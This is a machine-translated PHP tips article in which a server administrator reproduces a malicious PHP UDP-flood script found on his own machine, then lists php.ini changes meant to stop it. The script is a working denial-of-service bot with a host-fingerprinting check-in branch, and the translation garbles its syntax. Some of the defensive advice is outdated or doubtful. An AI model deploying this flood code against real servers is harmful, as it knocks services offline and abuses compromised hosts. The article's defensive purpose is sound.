PHP DDoS attack solution _php Tips

This article describes the DDoS attack solution for PHP. Share to everyone for your reference. The specific analysis is as follows:

Today, one of their own machine suddenly send a large number of packets outside, can be more than 1G per second, although I use the strategy of UDP ban packet is not sent out but very occupy the cup Ah, so think of the last to find a way to solve.

First look at the source code, the following:

Copy Code code as follows:

<?php
Set_time_limit (999999);
$host = $_get[' host '];
$port = $_get[' Port '];
$exec _time = $_get[' time '];
$Sendlen = 65535;
$packets = 0;
Ignore_user_abort (True);

if (StrLen ($host) ==0 or StrLen ($port) ==0 or StrLen ($exec _time) ==0) {
if (StrLen $_get[' rat ') <>0) {
echo $_get[' rat '].$_server["Http_host"]. "|". gethostbyname ($_server[' server_name '). "|". Php_uname (). "|". $_server[' server_software '].$_get[' rat '];
Exit
}
echo "Parameters can not be empty!";
Exit
}

for ($i =0; $i < $Sendlen; $i + +) {
$out. = "A";
}

$max _time = time () + $exec _time;

while (1) {
$packets + +;
if (Time () > $max _time) {
Break
}
$fp = Fsockopen ("udp://$host", $port, $errno, $ERRSTR, 5);
if ($fp) {
Fwrite ($fp, $out);
Fclose ($FP);
}
}

echo "Send Host: $host: $port <br><br>";
echo "Send Flow: $packets * ($Sendlen/1024=". Round ($Sendlen/1024, 2). ") kb/1024 =". Round ($packets * $Sendlen/1024/1024, 2). "Mb<br><br>";
echo "Send Rate:". Round ($packets/$exec _time, 2). "PACKS/S;" Round ($packets/$exec _time* $Sendlen/1024/1024, 2). "MB/s";
?>

The key code is as follows:

Copy Code code as follows:

$fp = Fsockopen ("udp://$ip", $rand, $errno, $ERRSTR, 5);

The method is simple, send UDP packet to target host, add the definition infinite dead loop, will form the big pressure.

This pressure is for the server that executes the script, because it first of its own network width, CPU and other resources caused a large amount of occupation, if you want to use this script to create pressure on the target site, you need to execute the script on multiple servers, DDoS, since it is used Fsockopen request outside, then don't let him request .

php.ini Set , the code is as follows:

Copy Code code as follows:

Allow_url_fopen = Off

If so he can still contract, the code is as follows:

Extension=php_sockets.dll

Change into

; Extension=php_sockets.dll

Restart Apache, IIS, NGINX, so you can prevent PHP DDoS packets.

Another netizen said, let the script is not allowed to set the timeout is very simple:

1. Disable the Set_time_limit function

2. Enable Safe mode for PHP (Safe_mode=on).

Disabling the socket function you can disable the socket module directly or disable the Fsockopen function, it is recommended that because the socket is often used to send mail back to the password, it is recommended to open the security mode directly, but in this case, the script every 30 seconds timeout, it is estimated that no "hacker "Loneliness goes to a point every 30 seconds to start DDoS.

Experience: This problem is usually caused by web site security, we should pay attention to the safety of the site and the security of the server, so it is not easy to be invaded, if you will use Macofee friends, the site will be a little more restrictive.

I hope this article will help you with your PHP program design.